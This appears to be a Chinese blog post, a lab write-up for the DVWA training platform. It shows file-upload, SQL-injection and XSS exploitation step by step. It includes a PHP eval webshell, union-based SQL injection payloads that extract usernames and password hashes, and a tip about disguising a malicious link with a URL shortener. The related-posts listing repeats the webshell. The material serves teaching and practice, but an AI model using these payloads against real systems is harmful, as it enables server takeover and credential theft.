【无标题】信息安全之漏洞利用(二)

最新推荐文章于 2022-12-24 19:46:18 发布
最新推荐文章于 2022-12-24 19:46:18 发布
阅读量2.7k 收藏
点赞数 1
分类专栏: 信息安全 文章标签: web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53055338/article/details/124364369
版权
本文详述了信息安全中的文件上传漏洞利用过程,包括创建PHP后门、使用中国菜刀进行文件管理,以及SQL注入的步骤,如猜解SQL语句、获取数据库信息和用户密码。此外,还介绍了三种类型的XSS攻击,展示了DOM XSS、反射型XSS和存储型XSS的利用方式。内容涵盖了Web安全的重要概念和技术。
摘要由CSDN通过智能技术生成

信息安全之漏洞利用二

任务四:文件上传
1、建立一个PHP文件,内容为:<?php @eval($_POST['pass']);?>。
2、打开File Upload界面,将PHP一句话木马上传。
3、得到木马在服务器上的路径。如图
在这里插入图片描述
4、打开中国菜刀,把上传木马路径添加到工具上。
5、双击网址进入文件管理。(注:这里可以进行文件管理,数据库管理,虚拟终端或运行自写脚本)如图
在这里插入图片描述
任务五:
1、打开SQL Injection界面,该界面的功能是通过输入User ID查询Username。
2、输入1提交,将正常返回查询结果。
在这里插入图片描述

3、输入1’提交,将返回一个错误。
在这里插入图片描述

4、猜测使用的sql语句可能是:select First name and Surname from 表名 where id=‘输入的id’。
5、输入1’ union select 1,database()#提交,得到数据库名称。
在这里插入图片描述
6、输入1’ union select 1,table_name from information_schema.tables where table_schema=‘dvwa’#,得到数据库中的表名。
在这里插入图片描述
7、输入1’ union select 1,column_name from information_schema.columns where table_name=‘users’#,得到users表的列名。
在这里插入图片描述

8、输入1’ union select 1,concat(user,password) from users#,得到users表的所有用户名和密码。

在这里插入图片描述
我们可看出密码都是经过MD5加密过的,在线搜索MD5解密工具进行解密,以其中一个为例,如图在这里插入图片描述
任务六:跨站攻击
1、打开XSS(DOM)界面,点击Select按钮,修改地址栏中的default属性为,回车后命令被执行。
在这里插入图片描述

2、打开XSS(Reflected)界面,点击Submit,修改地址栏中的name=。
3、利用在线短链接生成器伪造该链接,将短链接发送给小伙伴,命令被执行。
在这里插入图片描述

4、打开XSS(Stored)界面,在message栏中填入

,提交后内容被存入数据库,之后每次进入该页面命令都会被执行。

在这里插入图片描述
特别鸣谢:小明老师

LapMoby盼
关注
专栏目录
文件上传漏洞
qq_51553814的博客
07-13 317
文件上传 原理: 如果一个网站有文件上传,我们向该网站上传一个木马文件,如php文件。当我们通过相应的目录访问到该文件时,php文件内的代码发生了运行,这就是文件上传漏洞。 通过文件上传漏洞,我们可以写一个木马php文件 <php? eval(_POST['a']);?> 通过中国蚁剑连接到对应的文件上传目录,我们就可以连接到对应的url了,从而获取url里其他目录的文件 蚁剑的使用方法简单不加以说明 当然,当我们进行文件上传时,客户端或者是服务端不会让我们直接上传.php木马文件,会对前
第七天--文件上传漏洞
weixin_46653764的博客
06-04 463
文件上传章节就用upload-labs靶场 一、文件上传基础及一句话木马 1、首先了解一下 “一句话木马“ 如:<?php @eval($_POST["pass"]) ?> 是最简单的一句话木马 那它是啥意思呢? 这是一段php代码,写在<?php ?>里面才能被服务器解析; @符号是不报错,即使执行错误也不报错 $_POST是用post方法接受变量pass的值 eval()函数是把字符串当成PHP代码执行 所以,利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以.
文件上传漏洞(一句话木马)-学习笔记
小龙在线
08-21 2万+
在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权 限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马
Web安全-一句话木马
liuwei0376的专栏
08-20 4178
概述 在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马: <?php @eval($_POST['attack']);?> 【基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀 chopper.exe 即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语
PHP一句话木马,中国菜刀
热门推荐
VioletKiss
05-10 2万+
通过木马对上传漏洞进行上传,从而侵入到系统 实验准备: DVWA漏洞演练平台,浏览器,中国菜刀 1.新建PHP文件 新建一个PHP文件,内容为: 2.上传木马 在DVWA下的上传(upload)上上传新建的PHP文件 3.中国菜刀 打开中国菜刀,把木马上传路径添加到工具上,网址加上传路径,游记网址,进入文件管理(可进行
APT漏洞利用利器工具
最新发布
06-27
标题中的“APT漏洞利用利器工具”指的是Advanced Persistent Threat(高级持续性威胁)的漏洞利用工具。APT通常由具有高度组织和技术能力的攻击者使用,旨在长期、秘密地侵入目标网络,窃取敏感信息或进行其他恶意...
信息安全技术:目录遍历漏洞概念.pptx
11-01
目录遍历漏洞是网络安全领域中一个重要的问题,它涉及到网站的配置缺陷和文件访问控制。这种漏洞允许攻击者通过构造特定的URL请求,从而突破正常权限限制,访问到服务器上本应受保护的目录和文件。这种攻击方式通常...
IIS短文件漏洞利用工具.zip
05-12
标题中的"IIS短文件漏洞利用工具"指向的是一个针对微软Internet Information Services(IIS)服务器的安全漏洞。IIS是Windows操作系统中广泛使用的Web服务器,它处理HTTP、HTTPS和其他网络协议,为用户提供网页...
信息收集及漏洞利用--安全(四)
qq_43371350的博客
04-03 3065
信息收集 收集目标web服务器的网络信息、系统信息、组织信息 网络信息 包括:域名、TCP/UDP的端口、网络协议、防火墙、访问控制策略等 系统信息 包括:系统标识、站点目录、系统架构、路由表、测试/临时文件 组织信息 包括:员工信息、邮箱/电话、公司地址、组织网站、组织背景等 whois信息 收集注册人、电话、邮箱、dns、地址等 whois 信息 whois.chinaz.com , wwww...
安全漏洞发现和利用.pdf
05-10
标题“云安全漏洞发现和利用”以及描述中的“PSRC漏洞挖掘技术分享”涉及的是关于云计算环境中安全漏洞的发掘和利用方法。以下是基于这些信息详细阐述的云计算安全知识点: 一、了解云服务 1.1 国内的公有云厂商:...
免杀代码—— 一句话php
01-15
收集于互联网,仅限个人研究使用。
文件上传upload-lads
sheep_qm的博客
12-21 1564
文件上传upload-lads 第一关 前端绕过(js) 本关是对文件名的过滤(在客户端进行) 即若文件名中存在php等后缀则直接过滤(弹窗) 上传一个webshell到服务器 但只容许上传".jpg|.png|.gif"; ".jpg|.png|.gif"; jpg。png。gif的文件都不可执行,所以需要上传.php的文件 创建1.jpg 写入一句话木马 GIF89a <?php @eval ($_POST[pass] ) ;?> 使用bp重放 修改文件名为1.php即可 或者 因为是进
文件上传漏洞练习—upload-labs通关记录(踩坑!!!)
Wuxia_Bai的博客
12-24 942
一步步做下来的真实记录,希望能帮助大家,避免踩坑!!!一个简单的记录,部分关卡需要进行相应配置,均已说明。
图片写入一句话木马
qq_53065516的博客
03-28 6692
图片制作一句话木马: 1:选择一个图片用工具打开,winhex或者其他工具都可以,例如我选取一张图片用winhex打开,然后在其后写入一句话木马,在这里我的一句话木马是:<?php @eval($_POST['pass']);?> 可以发现成功写入。 将此文件上传入dvwa后,在D:\phpstudy_pro\WWW\DVWA-master\hackable\uploads会发现出现我修改后的图片1.jpg 此时dvwa出现/…/hackable/uploads/1.jpg succesf
PHP之一句话木马
bolinmengling的博客
02-27 2万+
一句话木马的普通形式 <?php eval(@$_POST['password']);?> <?php ;?>是php的格式 eval是执行函数 POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句话木马通过_POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句话木马通过P​OST是传入的参数,此处使用的...
基于owasp实现文件包含漏洞
M_Young的博客
12-05 455
文件包含渗透 <?fputs(fopen(‘‘shell.php’’, ‘‘w’’),‘<?php eval($_POST[pass]);?>’)?> 注:打开shell.php的文件,并写入<?php eval($_POST[pass]);?> 就在本地生成了一句话木马,然后就可以通过菜刀这样的工具连接木马。 本地文件包含LFI:(首先需要上传文件,才能修改=后面的文件) 192.168.40.108/dvwa/vulnerabilities/fi/index.php
%3c?php@ eval($_post['post']);?%3e,web 攻击靶机
weixin_35171603的博客
04-01 1815
1、sql注入靶机攻击php首先搭建虚拟机 用kali扫描下当前网段netdiscover -r 192.168.2.0/24css发现可疑ip地址192.168.2.129sql并使用nmap扫描这个ip地址,发现其开放了ftp和http协议数据库 打开该虚拟机提供的网页,发现该网站使用url传参,可能存在sql注入点cookie 在id=1后加一个引号,网页报错 该网站存在sql注入漏洞ssh...
php eval一句话木马干啥的,<?php eval($_POST[cmd]);?>一句话木马解读
weixin_39875503的博客
03-09 3804
php网页木马代码,大家可以看下自己的网站里面是不是有这样的代码,注意网站安全用mcafee限制w3wp.exe生成php或者asp文件。并在php.ini中设置一下。php网页木马header("content-Type:text/html;charset=gb2312");if(get_magic_quotes_gpc())foreach($_POSTas$k=>$v)$_POST[...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值